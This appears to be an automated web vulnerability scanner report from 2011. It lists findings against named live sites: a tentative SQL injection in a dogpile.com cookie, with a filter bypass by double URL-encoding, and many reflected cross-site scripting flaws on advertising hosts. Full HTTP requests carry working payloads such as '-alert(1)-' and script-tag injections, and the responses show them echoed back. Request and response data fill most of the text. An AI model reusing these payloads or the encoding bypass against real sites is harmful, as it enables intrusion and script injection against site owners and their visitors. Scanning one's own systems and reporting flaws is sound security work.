Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a8aa3c67a6df4df58725c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:35 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:34 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

1.4. http://www.dogpile.com/dogpile_other/ws/index [wsViewRecent cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The wsViewRecent cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the wsViewRecent cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1%2527; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=4007b90f8c664cd98297c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:11 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
=true"); }
.addSearchProvider { background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_cloud.gif/_iceUrlFlag=15?_IceUrl=true"); }
.tellFriendError{background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/error_icn.gif/_iceUrlFlag=15?_IceUrl=true");}
.tellFriendSuccess{background-image:url("http://ttl60m.dp
...[SNIP]...

Request 2

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1%2527%2527; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=3772e0b16dad447aa616c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:07 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:07 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:06 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 163 instances of this issue:


2.1. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7384'-alert(1)-'7c333334a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtappc7384'-alert(1)-'7c333334a54/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 484
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtappc7384'-alert(1)-'7c333334a54/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.2. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb9e1'-alert(1)-'613b7c7ac4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/generalbb9e1'-alert(1)-'613b7c7ac4f;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 484
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:12 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/generalbb9e1'-alert(1)-'613b7c7ac4f;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.3. http://a.collective-media.net/adj/ns.androidtapp/general [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 347a8'-alert(1)-'d4c2fe2cbc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277?&347a8'-alert(1)-'d4c2fe2cbc9=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 488
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277?&347a8'-alert(1)-'d4c2fe2cbc9=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.4. http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 325d1'-alert(1)-'e054d2cf3d2 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277?325d1'-alert(1)-'e054d2cf3d2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277?325d1'-alert(1)-'e054d2cf3d2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.5. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1234'-alert(1)-'50d2c8c77f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadjb1234'-alert(1)-'50d2c8c77f2/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7684
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-71818458_1301681756","http://ad.doubleclick.net/adjb1234'-alert(1)-'50d2c8c77f2/ns.androidtapp/general;net=ns;u=,ns-71818458_1301681756,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43
...[SNIP]...

2.6. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7527'-alert(1)-'fdf3b6f66b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtappd7527'-alert(1)-'fdf3b6f66b/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:57 GMT
Content-Length: 7683
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-36871899_1301681757","http://ad.doubleclick.net/adj/ns.androidtappd7527'-alert(1)-'fdf3b6f66b/general;net=ns;u=,ns-36871899_1301681757,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex
...[SNIP]...

2.7. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2e22'-alert(1)-'3e8eb7d654d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtapp/generale2e22'-alert(1)-'3e8eb7d654d;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7684
Date: Fri, 01 Apr 2011 18:15:57 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-51986405_1301681757","http://ad.doubleclick.net/adj/ns.androidtapp/generale2e22'-alert(1)-'3e8eb7d654d;net=ns;u=,ns-51986405_1301681757,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex.11-ex.6
...[SNIP]...

2.8. http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d22'-alert(1)-'cdf5b1c5e11 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtapp/general;ppos=10d22'-alert(1)-'cdf5b1c5e11 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7576
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
=ns;u=,ns-41308500_1301681756,11e4f07c0988ac7,none,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex.11-ex.6-bk.jb;;ppos=10d22'-alert(1)-'cdf5b1c5e11;contx=none;dc=w;btg=dx.13;btg=dx.4;btg=dx.1;btg=dx.2;btg=dx.6;btg=dx.12;btg=dx.15;btg=dx.22;btg=dx.26;btg=dx.28;btg=dx.30;btg=dx.31;btg=dx.34;btg=dx.36;btg=dx.5;btg=dx.ch;btg=dx.bi;btg=dx.24;btg=dx.42
...[SNIP]...

2.9. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 4b45f<script>alert(1)</script>40dfedbedff was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_2896694b45f<script>alert(1)</script>40dfedbedff HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
